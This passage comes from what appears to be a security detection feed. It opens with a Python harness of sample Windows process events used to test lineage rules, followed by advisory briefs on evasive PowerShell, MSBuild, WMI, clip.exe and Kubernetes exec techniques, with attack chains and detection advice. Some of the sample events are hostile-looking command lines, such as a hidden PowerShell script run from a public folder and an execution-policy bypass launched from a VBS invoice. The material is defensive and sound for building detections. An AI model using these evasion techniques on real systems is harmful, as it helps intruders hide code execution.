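    _ev(_SVCHOST, _SCHED_ARGS, _PS, ["powershell.exe", "-w", "hidden", "-File", "C:\\Users\\Public\\update.ps1"]),
    # 1: Task Scheduler -> cmd running a System32 tool: same lineage, no user-writable path
    _ev(_SVCHOST, _SCHED_ARGS, "C:\\Windows\\System32\\cmd.exe",
        ["cmd.exe", "/c", "C:\\Windows\\System32\\defrag.exe", "C:", "/O"]),
    # 2: MSBuild -> csc.exe (routine on a build host, suspicious on a workstation)
    _ev("C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe", ["MSBuild.exe", "C:\\Users\\bob\\task.csproj"],
        "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe", ["csc.exe", "/noconfig", "/out:C:\\Users\\bob\\a.dll"]),
    # 3: WMI provider host -> ipconfig
    _ev("C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", ["WmiPrvSE.exe", "-secured", "-Embedding"],
        "C:\\Windows\\System32\\ipconfig.exe", ["ipconfig.exe", "/all"]),
    # 4: wscript -> powershell
    _ev("C:\\Windows\\System32\\wscript.exe", ["wscript.exe", "C:\\Users\\bob\\Downloads\\invoice.vbs"],
        _PS, ["powershell.exe", "-nop", "-ep", "bypass", "-c", "Get-Date"]),
    # 5: explorer -> powershell: interactive use, no lineage rule applies
    _ev("C:\\Windows\\explorer.exe", ["explorer.exe"], _PS, ["powershell.exe"]),
]


def run(events=SAMPLE_EVENTS):
    """Evaluate each event; returns a list of (index, matched rule names) for hits."""
    return [(i, evaluate(e)) for i, e in enumerate(events) if evaluate(e)]


if __name__ == "__main__":
    for idx, names in run():
        print(f"event {idx}: {', '.join(names)}")
```

Sample 1 shows why the Scheduled Task rule carries the path condition: the Task Scheduler spawns cmd.exe and powershell.exe constantly for built-in maintenance tasks, and it is the user-writable script location, not the lineage, that separates those from a persistence payload. Sample 2 is the tuning case the MSBuild brief calls out; on build servers, add an exclusion for csc.exe rather than for MSBuild as a parent.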
attempts.","title":"Suspicious PowerShell Execution via Windows Script Host","url":"https://feed.craftedsignal.io/briefs/2024-01-script-powershell-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","obfuscation"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers are increasingly using obfuscation techniques to evade detection, specifically leveraging \u003ccode\u003eclip.exe\u003c/code\u003e in conjunction with PowerShell and command-line interpreters. This combination allows for the execution of malicious code while bypassing traditional signature-based detections. This activity often includes encoding and splitting commands to avoid string-based detection. Invoke-Obfuscation is a known framework used to generate these types of payloads. Defenders should focus on detecting the specific patterns of command execution and data manipulation that are characteristic of this technique. 
The detection of such obfuscated PowerShell commands is crucial for identifying and mitigating potential security breaches.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to the target system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eA command interpreter (cmd.exe) is invoked to execute a complex, obfuscated command.\u003c/li\u003e\n\u003cli\u003eThe command includes \u003ccode\u003eecho\u003c/code\u003e to write data to standard output, piping the output to \u003ccode\u003eclip.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eclip.exe\u003c/code\u003e places the output (part of the malicious PowerShell code) into the clipboard.\u003c/li\u003e\n\u003cli\u003eAnother \u003ccode\u003ecmd.exe\u003c/code\u003e process invokes PowerShell to execute the content retrieved from the clipboard.\u003c/li\u003e\n\u003cli\u003ePowerShell uses reflection to load and execute .NET assemblies from the clipboard.\u003c/li\u003e\n\u003cli\u003eThe executed code performs malicious actions, such as downloading additional payloads or establishing persistence.\u003c/li\u003e\n\u003cli\u003eThe clipboard content is cleared to remove traces of the injected code.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful execution of obfuscated PowerShell commands can lead to a range of malicious activities, including malware installation, data theft, and remote system control. The use of \u003ccode\u003eclip.exe\u003c/code\u003e and other obfuscation techniques significantly hinders detection efforts, potentially allowing attackers to operate undetected for extended periods. 
This can result in significant financial losses, data breaches, and reputational damage for affected organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Invoke-Obfuscation Via Use Clip\u0026rdquo; to your SIEM to detect command lines using \u003ccode\u003eclip.exe\u003c/code\u003e and obfuscated PowerShell (see rule details).\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for instances of \u003ccode\u003ecmd.exe\u003c/code\u003e invoking \u003ccode\u003eclip.exe\u003c/code\u003e with command lines containing \u003ccode\u003eecho\u003c/code\u003e piped to \u003ccode\u003eclip.exe\u003c/code\u003e (logsource: process_creation, product: windows).\u003c/li\u003e\n\u003cli\u003eInspect PowerShell execution logs for commands that access the clipboard, especially when followed by assembly loading or remote code execution (logsource: process_creation, product: windows).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:30:00Z","date_published":"2024-01-03T14:30:00Z","id":"/briefs/2024-01-invoke-obfuscation-clip/","summary":"The use of `clip.exe` in conjunction with PowerShell and command-line obfuscation is used to evade detection.","title":"Invoke-Obfuscation via Clip.exe","url":"https://feed.craftedsignal.io/briefs/2024-01-invoke-obfuscation-clip/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["kubernetes"],"_cs_severities":["high"],"_cs_tags":["kubernetes","execution","command and control","threat detection"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious activity within Kubernetes environments where attackers leverage \u003ccode\u003ekubectl exec\u003c/code\u003e or similar API calls to execute commands within pods. 
Specifically, it focuses on instances where these commands involve using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to retrieve content over HTTPS. Attackers may use this technique to download malicious scripts, tools, or exfiltrate sensitive data from compromised pods. This activity is flagged based on decoded request URIs from Kubernetes audit logs, reconstructed command strings, and filtering of benign traffic related to cluster health checks and OIDC/JWKS endpoints. The rule aims to detect anomalous behavior that deviates from typical pod execution patterns, helping defenders identify potential intrusions or misuse of pod execution privileges. The rule was created on 2026/04/23 and last updated on 2026/04/23 according to the source.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to the Kubernetes cluster, possibly through compromised credentials or a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a target pod within the cluster to execute commands within.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ekubectl exec\u003c/code\u003e or a similar API call to initiate a shell session within the target pod.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a command using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to download a malicious script, tool, or exfiltrate data over HTTPS. 
The URL is often encoded in the requestURI.\u003c/li\u003e\n\u003cli\u003eThe Kubernetes API server records the exec call and its parameters in the audit logs.\u003c/li\u003e\n\u003cli\u003eThe detection rule decodes the requestURI, extracts the command string, and identifies the use of \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e with an HTTPS URL.\u003c/li\u003e\n\u003cli\u003eThe rule filters out known benign URLs associated with cluster health checks or OIDC/JWKS endpoints.\u003c/li\u003e\n\u003cli\u003eIf the command is identified as malicious, an alert is triggered, indicating a potential compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the deployment of malicious tools within the Kubernetes environment, potentially enabling lateral movement, data theft, or denial-of-service attacks.  Compromised pods could expose sensitive data or be used as a launchpad for further attacks on the cluster or other systems. 
The scope of impact depends on the permissions granted to the compromised pod and the attacker\u0026rsquo;s objectives.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Kubernetes Pod Exec with Curl or Wget to HTTPS\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eReview Kubernetes RoleBindings for \u003ccode\u003epods/exec\u003c/code\u003e to ensure only required principals retain access on sensitive namespaces.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule by reviewing the decoded URI and reconstructed command in the alert details.\u003c/li\u003e\n\u003cli\u003eImplement network policies to restrict egress traffic from pods, limiting the potential for data exfiltration via HTTPS.\u003c/li\u003e\n\u003cli\u003eRegularly audit Kubernetes audit logs for suspicious activity related to pod execution and API calls.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:27:00Z","date_published":"2024-01-03T14:27:00Z","id":"/briefs/2024-01-kubernetes-pod-exec/","summary":"This rule detects Kubernetes pod exec API calls using curl or wget to fetch HTTPS URLs, potentially indicating malicious activity such as staging tools or exfiltrating data.","title":"Kubernetes Pod Exec with Curl or Wget to HTTPS","url":"https://feed.craftedsignal.io/briefs/2024-01-kubernetes-pod-exec/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["powershell","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Lenovo","PDQ.com Corporation","Dell Technologies Inc.","Chocolatey Software, Inc","Docker Inc"],"content_html":"\u003cp\u003eAttackers can leverage the PowerShell engine without directly executing \u003ccode\u003epowershell.exe\u003c/code\u003e. 
This technique, often referred to as \u0026ldquo;PowerShell without PowerShell,\u0026rdquo; involves using the underlying System.Management.Automation namespace. This approach allows attackers to bypass application allowlisting and PowerShell security features, operating more stealthily within a compromised environment. This technique makes detection more challenging, as standard PowerShell execution logs might not capture the activity. The activity is detected by monitoring which processes load the System.Management.Automation.dll or System.Management.Automation.ni.dll libraries. This activity can legitimately happen where vendors have their own PowerShell implementations that are shipped with some products.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through various means, such as exploiting a vulnerability or using compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker deploys a custom tool or script on the target system. 
This tool is designed to interact with the System.Management.Automation namespace directly.\u003c/li\u003e\n\u003cli\u003eThe custom tool loads the \u003ccode\u003eSystem.Management.Automation.dll\u003c/code\u003e or \u003ccode\u003eSystem.Management.Automation.ni.dll\u003c/code\u003e library into its process space.\u003c/li\u003e\n\u003cli\u003eThe tool uses the loaded PowerShell engine to execute malicious commands or scripts without invoking \u003ccode\u003epowershell.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance activities, such as gathering system information or network configurations, using PowerShell commands.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to move laterally within the network, leveraging the PowerShell engine to execute commands on other systems.\u003c/li\u003e\n\u003cli\u003eThe attacker installs malware or backdoors using the PowerShell engine to maintain persistence within the compromised environment.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive data or causes damage to the system, completing the objectives of the attack.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack leveraging \u0026ldquo;PowerShell without PowerShell\u0026rdquo; can lead to significant compromise of Windows systems. Attackers can bypass traditional security measures, potentially leading to data theft, system disruption, or the installation of persistent malware. 
The technique\u0026rsquo;s stealthy nature can prolong the time to detection, increasing the potential for widespread damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSuspicious PowerShell Engine ImageLoad\u003c/code\u003e to your SIEM to detect when the \u003ccode\u003eSystem.Management.Automation.dll\u003c/code\u003e or \u003ccode\u003eSystem.Management.Automation.ni.dll\u003c/code\u003e libraries are loaded by unexpected processes.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the process execution chain (parent process tree) for unknown processes.\u003c/li\u003e\n\u003cli\u003eImplement endpoint detection and response (EDR) solutions like Elastic Defend to provide visibility into process behavior and library loading events, activating the \u003ccode\u003eprocess_creation\u003c/code\u003e and \u003ccode\u003eimage_load\u003c/code\u003e log sources.\u003c/li\u003e\n\u003cli\u003eReview and tune exclusions to the Sigma rule based on legitimate vendor applications to reduce false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-suspicious-powershell-imageload/","summary":"This rule identifies instances where the PowerShell engine is loaded by processes other than powershell.exe, potentially indicating attackers attempting to use PowerShell functionality stealthily by using the underlying System.Management.Automation namespace and bypassing PowerShell security features.","title":"Suspicious PowerShell Engine 
ImageLoad","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-powershell-imageload/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["MSBuild"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","msbuild","proxy-execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe Microsoft Build Engine (MSBuild) is a software build platform typically used by developers. However, attackers can abuse MSBuild to execute malicious code by using it as a proxy execution method, allowing them to bypass traditional defenses. This technique involves invoking MSBuild from scripting environments like PowerShell or cmd.exe to run arbitrary code within the context of a trusted process. The activity detected by this rule focuses on instances where MSBuild is launched by a script interpreter, which is not typical for standard software development workflows. This behavior, observed since at least 2020, can be used for stealthy execution of payloads and defense evasion tactics, especially in environments that trust MSBuild as a legitimate system utility. Defenders should be aware of this technique as it allows attackers to blend in with normal system activity and bypass application control policies.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the target system, potentially through phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003eA script (e.g., PowerShell, cmd.exe) is used to execute a malicious command or series of commands.\u003c/li\u003e\n\u003cli\u003eThe script invokes \u003ccode\u003emsbuild.exe\u003c/code\u003e with specific arguments to execute arbitrary code. 
This might involve inline tasks or references to external XML project files containing malicious instructions.\u003c/li\u003e\n\u003cli\u003eMSBuild processes the provided XML file or inline task, interpreting and executing the malicious code.\u003c/li\u003e\n\u003cli\u003eThe executed code performs actions such as downloading additional payloads, modifying system configurations, or establishing persistence.\u003c/li\u003e\n\u003cli\u003eMSBuild, acting as a proxy, executes the attacker\u0026rsquo;s code within a trusted process, potentially evading detection by security software.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised system to move laterally within the network, escalating privileges, and accessing sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s final objective is achieved, such as data exfiltration or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code on Windows systems, potentially leading to data theft, system compromise, and further propagation within the network. This technique can bypass application control and other security measures, making it difficult to detect and prevent. The impact can range from minor data breaches to complete system takeover, depending on the attacker\u0026rsquo;s objectives and the compromised system\u0026rsquo;s role within the organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture the process tree and command-line arguments, enabling detection of suspicious MSBuild executions.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eMicrosoft Build Engine Started by a Script Process\u003c/code\u003e to your SIEM to identify instances of MSBuild being invoked by script interpreters. 
Tune the rule with appropriate whitelisting for known development activities to reduce false positives.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for \u003ccode\u003emsbuild.exe\u003c/code\u003e with parent processes such as \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecscript.exe\u003c/code\u003e, and \u003ccode\u003emshta.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of MSBuild to authorized users and directories.\u003c/li\u003e\n\u003cli\u003eRegularly review and update the list of excluded processes and directories in the Sigma rule to adapt to changing development practices.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-msbuild-script-execution/","summary":"Adversaries may use MSBuild, a legitimate Microsoft tool, to execute malicious code through script interpreters for defense evasion and execution on Windows systems.","title":"Suspicious MSBuild Execution from Scripting Processes","url":"https://feed.craftedsignal.io/briefs/2024-01-msbuild-script-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","mounted-device","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious execution of script interpreters or signed binaries from mounted devices in Windows environments. Attackers attempt to evade defenses by launching processes from non-standard directories, such as mounted devices. This technique can be employed following initial access via phishing or other means. 
The focus is on processes spawned by \u003ccode\u003eexplorer.exe\u003c/code\u003e with a working directory on removable drives (D, E, F) and named \u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003epwsh.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003eregsvr32.exe\u003c/code\u003e, \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003ecertutil.exe\u003c/code\u003e, \u003ccode\u003ebitsadmin.exe\u003c/code\u003e, \u003ccode\u003emsiexec.exe\u003c/code\u003e, \u003ccode\u003ewmic.exe\u003c/code\u003e, \u003ccode\u003eschtasks.exe\u003c/code\u003e, or \u003ccode\u003emsbuild.exe\u003c/code\u003e. This behavior is anomalous and indicative of potential malicious activity. The rule originates from Elastic\u0026rsquo;s detection rule set.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser unknowingly executes a malicious file (T1204.002) or opens a phishing email leading to drive-by compromise.\u003c/li\u003e\n\u003cli\u003eThe malicious file is downloaded onto the system, potentially onto a mounted device such as a USB drive (D:, E:, or F:).\u003c/li\u003e\n\u003cli\u003eThe user interacts with the mounted device via \u003ccode\u003eexplorer.exe\u003c/code\u003e, inadvertently triggering the execution of a malicious script or binary (TA0002).\u003c/li\u003e\n\u003cli\u003eThe script interpreter (e.g., powershell.exe, cmd.exe) or a signed binary (e.g., mshta.exe, regsvr32.exe) is executed from the mounted device (T1059).\u003c/li\u003e\n\u003cli\u003eThe process inherits the working directory from the mounted device, further masking its origin.\u003c/li\u003e\n\u003cli\u003eThe script or binary performs malicious actions, such as downloading additional malware, establishing persistence, or exfiltrating data 
(TA0005).\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the trusted binary or interpreter to proxy execution of their malicious code (T1127, T1218).\u003c/li\u003e\n\u003cli\u003eThe system is compromised, potentially leading to data theft, ransomware deployment, or lateral movement within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack of this nature can lead to the compromise of Windows systems. Attackers can evade traditional defenses, making detection more challenging. The impact can range from data theft and system compromise to lateral movement and ransomware deployment. Organizations may experience financial loss, reputational damage, and operational disruption if systems are successfully compromised using this technique.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture process execution events, including the working directory and parent process, which is essential for activating the rules below.\u003c/li\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Suspicious Execution from Mounted Device\u0026rdquo; Sigma rule to your SIEM to detect potentially malicious processes being launched from unusual locations and tune for your environment.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of script interpreters and signed binaries from removable drives to mitigate the risk of this attack.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of executing files from untrusted sources, particularly from removable media, to prevent initial infection (T1204).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-suspicious-execution-mounted-device/","summary":"Attackers may use mounted devices as a non-standard working 
directory to execute signed binaries or script interpreters, evading traditional defense mechanisms, particularly when launched via explorer.exe.","title":"Suspicious Execution from a Mounted Device","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-execution-mounted-device/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Windows Security Event Logs"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","windows","process-execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies instances of process execution originating from suspicious default Windows directories. Attackers often exploit these locations to conceal malware, leveraging the implicit trust associated with system or application paths to evade security measures. This tactic is employed to make malicious executions appear less conspicuous. The rule focuses on detecting specific processes, including \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003eregsvr32.exe\u003c/code\u003e, and others, when they are executed from unusual directories, such as \u003ccode\u003eC:\\\\PerfLogs\\\\\u003c/code\u003e, \u003ccode\u003eC:\\\\Users\\\\Public\\\\\u003c/code\u003e, and \u003ccode\u003eC:\\\\Windows\\\\Tasks\\\\\u003c/code\u003e. The intent is to highlight anomalous process behaviors that deviate from expected norms, providing early warning of potential malicious activity. 
The detection logic also includes filters to reduce false positives by excluding known legitimate executables and command line arguments from the specified directories.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through various means such as phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads or drops a malicious payload into a suspicious directory like \u003ccode\u003eC:\\\\Users\\\\Public\\\\\u003c/code\u003e or \u003ccode\u003eC:\\\\Windows\\\\Tasks\\\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a legitimate Windows utility such as \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, or \u003ccode\u003ewscript.exe\u003c/code\u003e to execute the malicious payload.\u003c/li\u003e\n\u003cli\u003eThe executed script or binary performs malicious actions, such as establishing persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to evade detection by masquerading the malicious activity as legitimate system processes.\u003c/li\u003e\n\u003cli\u003eThe malware may attempt to communicate with a command-and-control server.\u003c/li\u003e\n\u003cli\u003eThe malware may perform lateral movement within the network.\u003c/li\u003e\n\u003cli\u003eThe final objective of the attacker is to exfiltrate sensitive data or cause damage to the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to malware infection, data compromise, and system instability. Attackers can establish persistent access, escalate privileges, and perform lateral movement within the network. The impact ranges from minor disruptions to significant data breaches depending on the attacker\u0026rsquo;s objectives and the compromised system\u0026rsquo;s role within the organization. 
The targeted sectors are broad, as this technique is applicable across various industries and organizational sizes.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Execution from Unusual Directory - Command Line\u0026rdquo; to your SIEM and tune for your environment to detect suspicious process executions from unusual directories.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by the Sigma rule, focusing on the process execution chain and command-line arguments.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to provide the necessary data for the Sigma rule (reference log source in rule).\u003c/li\u003e\n\u003cli\u003eRegularly review and update the list of suspicious directories in the Sigma rule to reflect changes in your environment.\u003c/li\u003e\n\u003cli\u003eImplement application whitelisting to restrict the execution of unauthorized applications from unusual directories.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-03-execution-from-unusual-directory/","summary":"This rule identifies process execution from suspicious default Windows directories, which adversaries may abuse to hide malware in trusted paths to evade defenses.","title":"Execution from Unusual Directory - Command Line","url":"https://feed.craftedsignal.io/briefs/2024-01-03-execution-from-unusual-directory/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Sysmon"],"_cs_severities":["medium"],"_cs_tags":["windows","wmi","script_execution","initial_access","execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies the use of Windows script interpreters (cscript.exe or wscript.exe) to execute processes via Windows Management Instrumentation (WMI). 
Adversaries exploit WMI to execute scripts or processes stealthily, often using script interpreters. The rule monitors for these interpreters executing processes via WMI, specifically when initiated by non-system accounts, indicating potential malicious intent. The detection focuses on identifying scenarios where \u003ccode\u003ewmiutils.dll\u003c/code\u003e is loaded by \u003ccode\u003ewscript.exe\u003c/code\u003e or \u003ccode\u003ecscript.exe\u003c/code\u003e, followed by \u003ccode\u003ewmiprvse.exe\u003c/code\u003e spawning a new process. This is often associated with malicious initial access or execution techniques.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access via phishing (T1566) or other means.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a script, such as VBScript or JavaScript (T1059.005, T1059.007), to execute commands using WMI.\u003c/li\u003e\n\u003cli\u003eThe script interpreter (\u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e) loads \u003ccode\u003ewmiutils.dll\u003c/code\u003e to interact with WMI.\u003c/li\u003e\n\u003cli\u003eThe WMI Provider Host process (\u003ccode\u003ewmiprvse.exe\u003c/code\u003e) is invoked as a parent process, triggered by the script execution.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ewmiprvse.exe\u003c/code\u003e executes a secondary process, such as \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, or other executables, often from unusual locations like \u003ccode\u003eC:\\\\Users\\\\\u003c/code\u003e or \u003ccode\u003eC:\\\\ProgramData\\\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed process performs malicious actions, such as downloading additional payloads or establishing persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to maintain persistence by creating scheduled tasks or modifying registry 
keys.\u003c/li\u003e\n\u003cli\u003eThe ultimate objective is often lateral movement, data exfiltration, or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code, bypass security controls, and establish persistence on the compromised system. The use of WMI enables stealthy execution, making detection challenging. The impact can range from data theft and system compromise to full network takeover. In some cases, threat actors may deploy ransomware, leading to significant financial losses and operational disruption.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon Event ID 1 (Process Creation) and Event ID 7 (Image Loaded) logging to provide the necessary data for the provided Sigma rules.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule \u0026ldquo;WMI Scripting Process Creation\u0026rdquo; to detect suspicious process creation events originating from \u003ccode\u003ewmiprvse.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the provided Sigma rule \u0026ldquo;WMI Scripting Process Creation\u0026rdquo; with a focus on processes spawned by wmiprvse.exe from unusual locations or with suspicious command-line arguments.\u003c/li\u003e\n\u003cli\u003eImplement endpoint protection policies to block or alert on the execution of high-risk processes when initiated by non-system accounts as mentioned in the overview.\u003c/li\u003e\n\u003cli\u003eRegularly review and update endpoint protection policies to block or alert on the execution of high-risk processes like those listed in the detection query, especially when initiated by non-system accounts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wmi-script-execution/","summary":"The 
